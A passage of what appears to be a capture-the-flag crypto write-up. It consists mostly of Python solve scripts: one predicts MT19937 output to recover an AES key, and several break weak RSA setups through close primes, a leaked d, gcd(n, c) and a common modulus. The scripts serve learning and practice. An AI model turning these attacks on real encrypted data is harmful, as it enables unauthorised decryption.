class="hljs-number">2825776887</span>,<br><span class="hljs-number">3354142321</span>, <span class="hljs-number">1098235797</span>, <span class="hljs-number">1481266867</span>, <span class="hljs-number">1051367302</span>, <span class="hljs-number">1263016096</span>,<br><span class="hljs-number">1336057651</span>, <span class="hljs-number">1683842359</span>, <span class="hljs-number">4054448354</span>, <span class="hljs-number">1491994207</span>, <span class="hljs-number">1160110019</span>,<br><span class="hljs-number">3222808831</span>, <span class="hljs-number">177510926</span>, <span class="hljs-number">423347477</span>, <span class="hljs-number">803602771</span>, <span class="hljs-number">2683641253</span>,<br><span class="hljs-number">2919035439</span>, <span class="hljs-number">2485161789</span>, <span class="hljs-number">3378544338</span>, <span class="hljs-number">1610409532</span>, <span class="hljs-number">1545641821</span>,<br><span class="hljs-number">546762619</span>, <span class="hljs-number">2395983270</span>, <span class="hljs-number">3838745031</span>, <span class="hljs-number">789177414</span>, <span class="hljs-number">2123719243</span>,<br><span class="hljs-number">3476088109</span>, <span class="hljs-number">1615713790</span>, <span class="hljs-number">1335041829</span>, <span class="hljs-number">4006963851</span>, <span class="hljs-number">1700197865</span>,<br><span class="hljs-number">73798124</span>, <span class="hljs-number">1251950799</span>, <span class="hljs-number">2448692292</span>, <span class="hljs-number">937465221</span>, <span class="hljs-number">2191277155</span>,<br><span class="hljs-number">2283183462</span>, <span class="hljs-number">3235943428</span>, <span class="hljs-number">1888733145</span>, <span class="hljs-number">1637420644</span>, <span class="hljs-number">2906472352</span>,<br><span class="hljs-number">538528848</span>, <span class="hljs-number">1787881095</span>, <span class="hljs-number">2527345959</span>, <span class="hljs-number">816324140</span>, <span class="hljs-number">780626095</span>,<br><span class="hljs-number">3958671235</span>, <span class="hljs-number">1060151404</span>, <span class="hljs-number">3939612973</span>, <span class="hljs-number">720163439</span>, <span class="hljs-number">3130037256</span>,<br><span class="hljs-number">868218434</span>, <span class="hljs-number">594717218</span>, <span class="hljs-number">2378649142</span>, <span class="hljs-number">630567292</span>, <span class="hljs-number">272416131</span>,<br><span class="hljs-number">2656750985</span>, <span class="hljs-number">2254309115</span>, <span class="hljs-number">398769631</span>, <span class="hljs-number">144191385</span>, <span class="hljs-number">3584257427</span>,<br><span class="hljs-number">2276368553</span>, <span class="hljs-number">4037163602</span>, <span class="hljs-number">2651140730</span>, <span class="hljs-number">2231274829</span>, <span class="hljs-number">1953622167</span>,<br><span class="hljs-number">4083152642</span>, <span class="hljs-number">3006733661</span>, <span class="hljs-number">929392152</span>, <span class="hljs-number">843949652</span>, <span class="hljs-number">2714951407</span>,<br><span class="hljs-number">810363743</span>, <span class="hljs-number">1283798592</span>, <span class="hljs-number">3121903325</span>, <span class="hljs-number">1988057118</span>, <span class="hljs-number">356119324</span>,<br><span class="hljs-number">1904222878</span>, <span class="hljs-number">4044843055</span>, <span class="hljs-number">112669104</span>, <span class="hljs-number">868692487</span>, <span class="hljs-number">1115920155</span>,<br><span class="hljs-number">1623439582</span>, <span class="hljs-number">488326378</span>, <span class="hljs-number">148287535</span>, <span class="hljs-number">3338996246</span>, <span class="hljs-number">2166938666</span>,<br><span class="hljs-number">3797453833</span>, <span class="hljs-number">1474427255</span>, <span class="hljs-number">1386753952</span>, <span class="hljs-number">3317126798</span>, <span class="hljs-number">2190807666</span>,<br><span class="hljs-number">4259624962</span>, <span class="hljs-number">3066765455</span>, <span class="hljs-number">2382942891</span>, <span class="hljs-number">4046402452</span>, <span class="hljs-number">3243966738</span>,<br><span class="hljs-number">1774858251</span>, <span class="hljs-number">3181254579</span>, <span class="hljs-number">2171453049</span>, <span class="hljs-number">905778132</span>, <span class="hljs-number">1409024919</span>,<br><span class="hljs-number">4082347550</span>, <span class="hljs-number">1308497825</span>, <span class="hljs-number">3944454243</span>, <span class="hljs-number">1681570359</span>, <span class="hljs-number">3622008213</span>,<br><span class="hljs-number">1130389974</span>, <span class="hljs-number">3937594426</span>, <span class="hljs-number">4193387111</span>, <span class="hljs-number">4156444245</span>, <span class="hljs-number">1665819644</span>,<br><span class="hljs-number">4099931325</span>, <span class="hljs-number">546382740</span>, <span class="hljs-number">3459524364</span>, <span class="hljs-number">3215392046</span>, <span class="hljs-number">628790677</span>,<br><span class="hljs-number">2460115724</span>, <span class="hljs-number">4154656625</span>, <span class="hljs-number">1738275004</span>, <span class="hljs-number">372632247</span>, <span class="hljs-number">3901053671</span>,<br><span class="hljs-number">1968302733</span>, <span class="hljs-number">1542557146</span>, <span class="hljs-number">954360221</span>, <span class="hljs-number">94489421</span>, <span class="hljs-number">2526265974</span>,<br><span class="hljs-number">3493620125</span>, <span class="hljs-number">227040704</span>, <span class="hljs-number">1966827767</span>, <span class="hljs-number">2710288704</span>, <span class="hljs-number">1777503765</span>,<br><span class="hljs-number">3060587047</span>, <span class="hljs-number">2922448684</span>, <span class="hljs-number">1818271608</span>, <span class="hljs-number">3774695159</span>, <span class="hljs-number">198891092</span>,<br><span class="hljs-number">1892315134</span>, <span class="hljs-number">1988189925</span>, <span class="hljs-number">1877360903</span>, <span class="hljs-number">176031450</span>, <span class="hljs-number">782372078</span>,<br><span class="hljs-number">2630033970</span>, <span class="hljs-number">222585085</span>, <span class="hljs-number">1784220674</span>, <span class="hljs-number">187019927</span>, <span class="hljs-number">3793161227</span>,<br><span class="hljs-number">275394451</span>, <span class="hljs-number">3620112924</span>, <span class="hljs-number">1046758031</span>, <span class="hljs-number">794695465</span>, <span class="hljs-number">4020417715</span>,<br><span class="hljs-number">1036350909</span>, <span class="hljs-number">1034143101</span>, <span class="hljs-number">130770292</span>, <span class="hljs-number">3376762604</span>, <span class="hljs-number">3099991375</span>,<br><span class="hljs-number">1317943524</span>, <span class="hljs-number">538393453</span>, <span class="hljs-number">1676278328</span>, <span class="hljs-number">3728445031</span>, <span class="hljs-number">2444153711</span>,<br><span class="hljs-number">1294577644</span>, <span class="hljs-number">3255702608</span>, <span class="hljs-number">382221508</span>, <span class="hljs-number">501348604</span>, <span class="hljs-number">1545416914</span>,<br><span class="hljs-number">4046130944</span>, <span class="hljs-number">1518955393</span>, <span class="hljs-number">3919525514</span>, <span class="hljs-number">1729967634</span>, <span class="hljs-number">2572204860</span>,<br><span class="hljs-number">3777225961</span>, <span class="hljs-number">1646036822</span>, <span class="hljs-number">475018472</span>, <span class="hljs-number">2247517569</span>, <span class="hljs-number">4257731164</span>,<br><span class="hljs-number">1111295866</span>, <span class="hljs-number">524303023</span>, <span class="hljs-number">3981652986</span>, <span class="hljs-number">4072216404</span>, <span class="hljs-number">3747688429</span>,<br><span class="hljs-number">1885894640</span>, <span class="hljs-number">833446526</span>, <span class="hljs-number">3955045968</span>, <span class="hljs-number">1703975805</span>, <span class="hljs-number">1141801012</span>,<br><span class="hljs-number">2437322873</span>, <span class="hljs-number">2732846667</span>, <span class="hljs-number">1371506834</span>, <span class="hljs-number">669098384</span>, <span class="hljs-number">1963802511</span>,<br><span class="hljs-number">1542039</span>, <span class="hljs-number">728580454</span>, <span class="hljs-number">4041454310</span>, <span class="hljs-number">1019581040</span>, <span class="hljs-number">3144560205</span>,<br><span class="hljs-number">1329189307</span>, <span class="hljs-number">1043039655</span>, <span class="hljs-number">1028345076</span>, <span class="hljs-number">3541168610</span>, <span class="hljs-number">2082983922</span>,<br><span class="hljs-number">1305525731</span>, <span class="hljs-number">1078333930</span>, <span class="hljs-number">556043109</span>, <span class="hljs-number">3570861415</span>, <span class="hljs-number">1623319076</span>,<br><span class="hljs-number">3514585273</span>, <span class="hljs-number">223719132</span>, <span class="hljs-number">4031808254</span>, <span class="hljs-number">2549094947</span>, <span class="hljs-number">3825858427</span>,<br><span class="hljs-number">3214724358</span>, <span class="hljs-number">1835103180</span>, <span class="hljs-number">2471774591</span>, <span class="hljs-number">2111554082</span>, <span class="hljs-number">2948121215</span>,<br><span class="hljs-number">1362405065</span>, <span class="hljs-number">3765638194</span>, <span class="hljs-number">491471279</span>, <span class="hljs-number">2479158340</span>, <span class="hljs-number">3749279021</span>,<br><span class="hljs-number">3306251008</span>, <span class="hljs-number">2577577664</span>, <span class="hljs-number">1245538106</span>, <span class="hljs-number">503105027</span>, <span class="hljs-number">139202844</span>,<br><span class="hljs-number">2287890849</span>, <span class="hljs-number">3563168099</span>, <span class="hljs-number">1467460138</span>, <span class="hljs-number">3922094655</span>, <span class="hljs-number">1903765924</span>,<br><span class="hljs-number">3858903218</span>, <span class="hljs-number">3343562703</span>, <span class="hljs-number">2145132444</span>, <span class="hljs-number">1134537221</span>, <span class="hljs-number">2942539446</span>,<br><span class="hljs-number">914603375</span>, <span class="hljs-number">2155053085</span>, <span class="hljs-number">2864704965</span>, <span class="hljs-number">1971547127</span>, <span class="hljs-number">1892432263</span>,<br><span class="hljs-number">2604528206</span>, <span class="hljs-number">3387176542</span>, <span class="hljs-number">361652931</span>, <span class="hljs-number">2305859318</span>, <span class="hljs-number">1345198505</span>,<br><span class="hljs-number">2416327840</span>, <span class="hljs-number">887059258</span>, <span class="hljs-number">3219763770</span>, <span class="hljs-number">316636299</span>, <span class="hljs-number">307065443</span>,<br><span class="hljs-number">431437125</span>, <span class="hljs-number">4279494318</span>, <span class="hljs-number">220513368</span>, <span class="hljs-number">2362459616</span>, <span class="hljs-number">3712600310</span>,<br><span class="hljs-number">2105434588</span>, <span class="hljs-number">2938672182</span>, <span class="hljs-number">3316109731</span>, <span class="hljs-number">850677909</span>, <span class="hljs-number">1593089633</span>,<br><span class="hljs-number">1448569654</span>, <span class="hljs-number">2885245137</span>, <span class="hljs-number">3269946753</span>, <span class="hljs-number">885150079</span>, <span class="hljs-number">2358168430</span>,<br><span class="hljs-number">1785698607</span>, <span class="hljs-number">1757002566</span>, <span class="hljs-number">197277094</span>, <span class="hljs-number">47259139</span>, <span class="hljs-number">2710959991</span>,<br><span class="hljs-number">710476854</span>, <span class="hljs-number">1929434500</span>, <span class="hljs-number">1732169408</span>, <span class="hljs-number">381305673</span>, <span class="hljs-number">2982171232</span>,<br><span class="hljs-number">486112880</span>, <span class="hljs-number">3651033563</span>, <span class="hljs-number">734915423</span>, <span class="hljs-number">27291312</span>, <span class="hljs-number">93262695</span>, <span class="hljs-number">3206874794</span>,<br><span class="hljs-number">1595912125</span>, <span class="hljs-number">643556702</span>, <span class="hljs-number">2929755197</span>, <span class="hljs-number">1043917347</span>, <span class="hljs-number">3181953869</span>,<br><span class="hljs-number">3059173850</span>, <span class="hljs-number">986850461</span>, <span class="hljs-number">947059764</span>]<br>c = <span class="hljs-string">b'\xd1\xfb\xd3\xf0U\x14\x18\xa9Yf=\xa6\x7fJ\xd0aZ=\xf7\xf6\x1e]\xe</span><br><span class="hljs-string">7\x07\xbd\x0b\xc9\xf8\xe7k\xa7\x16\xc1Z:\xbf\xde\xea=3\xe0\x82\xf0</span><br><span class="hljs-string">\xca\xd2R\x91\xf5\x0f\xd1\x06\x99G\xf6\x8dh\x9c\x14Wi\xaf\xdbFL'</span><br>p = MT19937Predictor()<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(keys)):<br> <span class="hljs-keyword">if</span> i == <span class="hljs-number">0</span> <span class="hljs-keyword">or</span> i == <span class="hljs-number">1</span>:<br> p.setrandbits(keys[i], <span class="hljs-number">96</span>)<br> <span class="hljs-keyword">elif</span> i == <span class="hljs-number">2</span>:<br> p.setrandbits(keys[i], <span class="hljs-number">160</span>)<br> <span class="hljs-keyword">else</span>:<br> p.setrandbits(keys[i], <span class="hljs-number">32</span>)<br>key = long_to_bytes(p.getrandbits(<span class="hljs-number">128</span>))<br>cipher = AES.new(key, AES.MODE_ECB)<br><span class="hljs-built_in">print</span>(cipher.decrypt(c))<br></code></pre></td></tr></table></figure><h4 id="rsa1"><a href="#rsa1" class="headerlink" title="rsa1"></a>rsa1</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> gmpy2 <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> libnum <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> sympy <span class="hljs-keyword">import</span> Symbol, solve<br><br>n =<br><span class="hljs-number">263052151036556444232718736542708962392867896951240903497496655347</span><br>030779174123048395688336426644503139350992983109808538822728799817<br><span class="hljs-number">333727302920185445726253169028091645149821721819513197430720176978</span><br><span class="hljs-number">455360183911938712805658076206187867575909179942661137373035486546</span><br><span class="hljs-number">445794471527084919479819396932093770629328870790535356852229150496</span><br><span class="hljs-number">389737447859101878464880480546145958969057175481735030979324869765</span><br><span class="hljs-number">486066882840949851633878308711733511568723039018020638746431598720</span><br><span class="hljs-number">760454218561616970207098415632535433010886733475628741782754576629</span><br><span class="hljs-number">232683037514583732133798230917432542953920988520506573891006681965</span><br><span class="hljs-number">43581156089543387981749</span><br>s =<br><span class="hljs-number">432376188839801860985233550389630676768025468911830724991907694547</span><br><span class="hljs-number">410028005322221611789033509728065581257970021014285097211403261937</span><br><span class="hljs-number">551250809444470026826986129545436147993632348873493896748688708706</span><br><span class="hljs-number">598577033716795240591686551434266756834488451291939047301372100578</span><br><span class="hljs-number">334512777961405025668432954141993821521911163833487176922456680775</span><br><span class="hljs-number">866961517713961933064426534927060923173636688850699937339935445357</span><br>097485623027343695665767355279725404478989885037160883765164270530<br><span class="hljs-number">434676177658417006753634283995007755492171422341445272623175970167</span><br><span class="hljs-number">289998177020590065417477197719215223167155568706057662505599557637</span><br><span class="hljs-number">1428030016472160229195</span><br>c =<br><span class="hljs-number">185248798750464547657804192919021615051871190493172574402026453621</span><br><span class="hljs-number">845438569800378914461397473964726068841902955196930508257023983023</span><br><span class="hljs-number">750353560733540304390924790764933502804918799426762325432720350096</span><br><span class="hljs-number">197764486683676316747512700254224716976048073093289488117302117960</span><br><span class="hljs-number">771945626052730682480030670840626049531809810926028252690824431948</span><br><span class="hljs-number">217952675332595423452807894238853137150111987564082386752122949641</span><br><span class="hljs-number">692318667501217828913929749825388837594604996549649166726467135613</span><br><span class="hljs-number">652684976216699182605123181219874640872034889431924472446561205536</span><br><span class="hljs-number">579046437688110556345268676421219772827477860194136763860877425871</span><br><span class="hljs-number">20310706285467632914627</span><br>s = invert(s, n)<br>p = Symbol(<span class="hljs-string">'p'</span>)<br>q = Symbol(<span class="hljs-string">'q'</span>)<br>p, q = solve([p*q-n, <span class="hljs-number">1314</span>*p-<span class="hljs-number">520</span>*q-s], [p, q])[<span class="hljs-number">1</span>]<br>p = <span class="hljs-built_in">int</span>(p)<br>q = <span class="hljs-built_in">int</span>(q)<br>e = <span class="hljs-number">0x10001</span><br>d = invert(e, (p-<span class="hljs-number">1</span>)*(q-<span class="hljs-number">1</span>))<br><span class="hljs-built_in">print</span>(n2s(<span class="hljs-built_in">int</span>(<span class="hljs-built_in">pow</span>(c, d, n))))<br></code></pre></td></tr></table></figure><h4 id="rsa2"><a href="#rsa2" class="headerlink" title="rsa2"></a>rsa2</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> gmpy2 <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> libnum <span class="hljs-keyword">import</span> *<br><br>n =<br><span class="hljs-number">238762654508575671358510287787810886201517908033296159863590222635</span><br><span class="hljs-number">8817519910295819153349225103418927970241049968506375997</span><br>e = <span class="hljs-number">65537</span><br>c_mod_p =<br><span class="hljs-number">647648029783204084679833378591490303778808042166748545307033</span><br>c_mod_q =<br><span class="hljs-number">716978243624820144982668239669070880505037391756433243913335</span><br>p = iroot(n, <span class="hljs-number">2</span>)[<span class="hljs-number">0</span>]<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1000</span>):<br> p -= <span class="hljs-number">1</span><br> <span class="hljs-keyword">if</span> is_prime(p):<br> q = next_prime(p)<br> <span class="hljs-keyword">if</span> p * q == n:<br> <span class="hljs-keyword">break</span><br>d = invert(e, (p-<span class="hljs-number">1</span>)*(q-<span class="hljs-number">1</span>))<br>c = (c_mod_p*invert(q, p)*q + c_mod_q*invert(p, q)*p) % n<br><span class="hljs-built_in">print</span>(n2s(<span class="hljs-built_in">int</span>(<span class="hljs-built_in">pow</span>(c, d, n))))<br></code></pre></td></tr></table></figure><h4 id="rsa3"><a href="#rsa3" class="headerlink" title="rsa3"></a>rsa3</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> gmpy2 <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> random <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> libnum <span class="hljs-keyword">import</span> *<br><br>n =<br><span class="hljs-number">188967873698125067291611467924205824630751952897051303321451254418</span><br><span class="hljs-number">733590082594777787050506120280164455311715826994634692231291344971</span><br><span class="hljs-number">445531181649912595395041875120212083157545145459965748626898887237</span><br><span class="hljs-number">287793682780571588843094987919888248153809064898842219555690169130</span><br>020476901344950216383250763243372041203582891973454736452539648973<br>099366346746852564944679659947633462090885693129003103842218568901<br><span class="hljs-number">296385897087044885700621705878221598400044718474296513355960658451</span><br><span class="hljs-number">769226111774849793687011851983701434515540320977748838810639411649</span><br><span class="hljs-number">281952061512850530239004175395451889814468232855924339638179819245</span><br><span class="hljs-number">69149446287916824382561</span><br>d =<br><span class="hljs-number">570303122491907732419973942059121870908287360781051578252740339220</span><br><span class="hljs-number">307868569455744060617965508494647719854498579752945599835621330269</span><br><span class="hljs-number">957605816844472774817054983902631306402960988762479598103580128883</span><br><span class="hljs-number">884717221068545318785964533937694685480597142779529160717151510631</span><br>044297516166710458190688747759381052377384678111991309165223058531<br><span class="hljs-number">657869796695644102505041170327954373518461540837282708604806776384</span><br><span class="hljs-number">930402084497158641998559971529104925233730150484718391708603822536</span><br><span class="hljs-number">680400960107170185458725761899190302759279222335987910397905015838</span><br><span class="hljs-number">789849764531713411931658785602092604583448791594839180734620859416</span><br><span class="hljs-number">6279941244305061329677</span><br>friend_keys = [<span class="hljs-number">111697</span>, <span class="hljs-number">106721</span>, <span class="hljs-number">116423</span>, <span class="hljs-number">88843</span>, <span class="hljs-number">119159</span>, <span class="hljs-number">70639</span>,<br><span class="hljs-number">80819</span>, <span class="hljs-number">74489</span>, <span class="hljs-number">121931</span>, <span class="hljs-number">101141</span>]<br>c =<br><span class="hljs-number">119943816277590261628991702431952059974733907534741058474443015994</span><br><span class="hljs-number">713676303289993299715546728980427112583323434145558864911052354504</span><br><span class="hljs-number">158749675009997777271882222017017906158004439996946613911616036082</span><br>055807440463406857401324629566694286332025388751977088534191270008<br><span class="hljs-number">779080341556834184768390271768478250851917665006570639360873007076</span><br><span class="hljs-number">481731676382121844099404413411924949737800785206580576287472357022</span><br><span class="hljs-number">622616505330742074026659374590653420088138814836586558207941057332</span><br><span class="hljs-number">543906000961886292517862570359580397970322576894467801506859165178</span><br><span class="hljs-number">436658813407934921469807718087061030324980536021120464523763785971</span><br><span class="hljs-number">81639545983846067945876</span><br>e = <span class="hljs-number">0x10001</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">getpq</span>(<span class="hljs-params">n, e, d</span>):<br> <span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br> k = e * d - <span class="hljs-number">1</span><br> g = randint(<span class="hljs-number">0</span>, n)<br> <span class="hljs-keyword">while</span> k % <span class="hljs-number">2</span> == <span class="hljs-number">0</span>:<br> k = k // <span class="hljs-number">2</span><br> temp = <span class="hljs-built_in">pow</span>(g, k, n) - <span class="hljs-number">1</span><br> <span class="hljs-keyword">if</span> gcd(temp, n) > <span class="hljs-number">1</span> <span class="hljs-keyword">and</span> temp != <span class="hljs-number">0</span>:<br> <span class="hljs-keyword">return</span> gcd(temp, n)<br> <br>p = getpq(n, e, d)<br>q = n // p<br>e = friend_keys[::-<span class="hljs-number">1</span>]<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> e:<br> d = invert(i, (p-<span class="hljs-number">1</span>)*(q-<span class="hljs-number">1</span>))<br> c = <span class="hljs-built_in">pow</span>(c, d, n)<br><span class="hljs-built_in">print</span>(n2s(<span class="hljs-built_in">int</span>(c)))<br></code></pre></td></tr></table></figure><h4 id="rsa4"><a href="#rsa4" class="headerlink" title="rsa4"></a>rsa4</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> gmpy2 <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> libnum <span class="hljs-keyword">import</span> *<br>n =<br><span class="hljs-number">183442086222261455632753326316758528126379741172694105803563724847</span><br><span class="hljs-number">308686300410877719678631773994684369071796299917132879587129181558</span><br><span class="hljs-number">813229738078063019791207183379717666421411607154579591042300098658</span><br><span class="hljs-number">324903342684007080573788727939697060587669341739017208076013812602</span><br><span class="hljs-number">261097105286139148489114970449182731370969035223671208190169236130</span><br><span class="hljs-number">116969565310787350408667268361472446276177528664496808185757505553</span><br><span class="hljs-number">729250992038644652214672616437322584032823008305008570089510361002</span><br><span class="hljs-number">404173056527129662717509633650568886696914765886734571691835755476</span><br><span class="hljs-number">541735844114882890834797224475296874800939842148748401163866413086</span><br><span class="hljs-number">48928664471249163053399</span><br>c =<br><span class="hljs-number">579983521268267085460078742139430470076681265092933180830502478191</span><br><span class="hljs-number">980980841411674193803308765417352242984843483101191354085788397676</span><br><span class="hljs-number">380158573503149404435747599962380476958180615969553073532082998399</span><br><span class="hljs-number">439749491026281226926618342896422724047909834218501687591646346386</span><br><span class="hljs-number">927518053944991234743138821737299498766417181997016714589108746436</span><br><span class="hljs-number">589998667396760703644779473147836486866951277972369272912352206040</span><br><span class="hljs-number">320528602162853623679432136268470769811444759552382811051152158714</span><br><span class="hljs-number">214669087494756604211508176703651519240852315758703606342867857688</span><br><span class="hljs-number">122163468512773885694651433019810092928196342811091736957154981492</span><br>0857266365740708152342<br>e = <span class="hljs-number">0x10001</span><br>p = gcd(n, c)<br>q = n // p<br>d = invert(e, (p-<span class="hljs-number">1</span>)*(q-<span class="hljs-number">1</span>))<br><span class="hljs-built_in">print</span>(n2s(<span class="hljs-built_in">int</span>(<span class="hljs-built_in">pow</span>(c, d, n) // p // <span class="hljs-number">2021</span> // <span class="hljs-number">1211</span>)))<br></code></pre></td></tr></table></figure><h4 id="rsa5"><a href="#rsa5" class="headerlink" title="rsa5"></a>rsa5</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> gmpy2 <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> libnum <span class="hljs-keyword">import</span> *<br><br>n =<br><span class="hljs-number">891144984207806049175310331695963927694557383434158661755608277163</span><br><span class="hljs-number">290383258850402302871671301535627210852180312905989243937107773841</span><br><span class="hljs-number">953038680868615884968417761659604947541596656392698426712546417575</span><br>075348153361152791125779929640999825306786993897986335593649224451<br><span class="hljs-number">10277096686903849847611549099340416648410741</span><br>c1 =<br><span class="hljs-number">573595214164250048895743842869543903575784470761870418265549984302</span><br><span class="hljs-number">785693931107075581595481607224881671252613779267809254500379109463</span><br><span class="hljs-number">264954964587895170738468385721279941889478411443230506618785299911</span><br><span class="hljs-number">942169058745706546683996471606931113993709928602734694405889614991</span><br><span class="hljs-number">8834128185367804403864368930212475453509851</span><br>c2 =<br><span class="hljs-number">836612803701856474484530054607170668909910001884273264050010969359</span><br>023715667241812072726592738016216398866914801553640098315936954666<br><span class="hljs-number">777838655959716451005363698018156193371297668239384633381285547169</span><br><span class="hljs-number">700368179528705698222083265831417459305574539697953348924935249748</span><br><span class="hljs-number">70629590649696998539807821542822600655060074</span><br>e1 = <span class="hljs-number">65536</span><br>e2 = <span class="hljs-number">270270</span><br>s = gcdext(e1, e2)<br>s1 = s[<span class="hljs-number">1</span>]<br>s2 = s[<span class="hljs-number">2</span>]<br><span class="hljs-keyword">if</span> s1 < <span class="hljs-number">0</span>:<br> s1 = -s1<br> c1 = invert(c1, n)<br><span class="hljs-keyword">elif</span> s2 < <span class="hljs-number">0</span>:<br> s2 = -s2<br> c2 = invert(c2, n)<br>m = <span class="hljs-built_in">pow</span>(c1, s1, n) * <span class="hljs-built_in">pow</span>(c2, s2, n) % n<br>m = iroot(m, gcd(e1, e2))[<span class="hljs-number">0</span>]<br><span class="hljs-built_in">print</span>(n2s(<span class="hljs-built_in">int</span>(m)))<br></code></pre></td></tr></table></figure><h4 id="rsa6"><a href="#rsa6" class="headerlink" title="rsa6"></a>rsa6</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span 